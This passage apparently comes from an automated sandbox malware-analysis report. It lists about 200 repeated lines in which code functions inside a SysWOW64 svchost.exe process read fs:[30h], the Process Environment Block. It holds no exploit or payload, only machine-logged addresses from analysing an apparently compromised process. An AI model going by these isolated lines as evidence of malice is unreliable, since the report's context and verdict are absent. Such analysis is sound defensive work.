                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]1_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]1_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC8158 mov eax, dword ptr fs:[00000030h]1_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A280A0 mov eax, dword ptr fs:[00000030h]1_2_03A280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC80A8 mov eax, dword ptr fs:[00000030h]1_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]1_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]1_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]1_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB60E0 mov eax, dword ptr fs:[00000030h]1_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]1_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]1_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]1_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]1_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6030 mov eax, dword ptr fs:[00000030h]1_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]1_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]1_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]1_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6050 mov eax, dword ptr fs:[00000030h]1_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]1_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE47A0 mov eax, dword ptr fs:[00000030h]1_2_03AE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD678E mov eax, dword ptr fs:[00000030h]1_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]1_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]1_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]1_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]1_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]1_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]1_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]1_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]1_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE75D mov eax, dword ptr fs:[00000030h]1_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]1_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]1_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]1_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]1_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]1_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]1_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]1_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72619 mov eax, dword ptr fs:[00000030h]1_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A62674 mov eax, dword ptr fs:[00000030h]1_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4C640 mov eax, dword ptr fs:[00000030h]1_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov eax, dword ptr fs:[00000030h]1_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov ecx, dword ptr fs:[00000030h]1_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64588 mov eax, dword ptr fs:[00000030h]1_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E59C mov eax, dword ptr fs:[00000030h]1_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A325E0 mov eax, dword ptr fs:[00000030h]1_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]1_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]1_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]1_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]1_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A365D0 mov eax, dword ptr fs:[00000030h]1_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6500 mov eax, dword ptr fs:[00000030h]1_2_03AC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]1_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]1_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A364AB mov eax, dword ptr fs:[00000030h]1_2_03A364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A644B0 mov ecx, dword ptr fs:[00000030h]1_2_03A644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]1_2_03ABA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA49A mov eax, dword ptr fs:[00000030h]1_2_03AEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A304E5 mov ecx, dword ptr fs:[00000030h]1_2_03A304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C427 mov eax, dword ptr fs:[00000030h]1_2_03A2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC460 mov ecx, dword ptr fs:[00000030h]1_2_03ABC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA456 mov eax, dword ptr fs:[00000030h]1_2_03AEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2645D mov eax, dword ptr fs:[00000030h]1_2_03A2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5245A mov eax, dword ptr fs:[00000030h]1_2_03A5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]1_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]1_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03AE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03AE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EBFC mov eax, dword ptr fs:[00000030h]1_2_03A5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]1_2_03ABCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]1_2_03ADEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]1_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]1_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]1_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]1_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04B00 mov eax, dword ptr fs:[00000030h]1_2_03B04B00
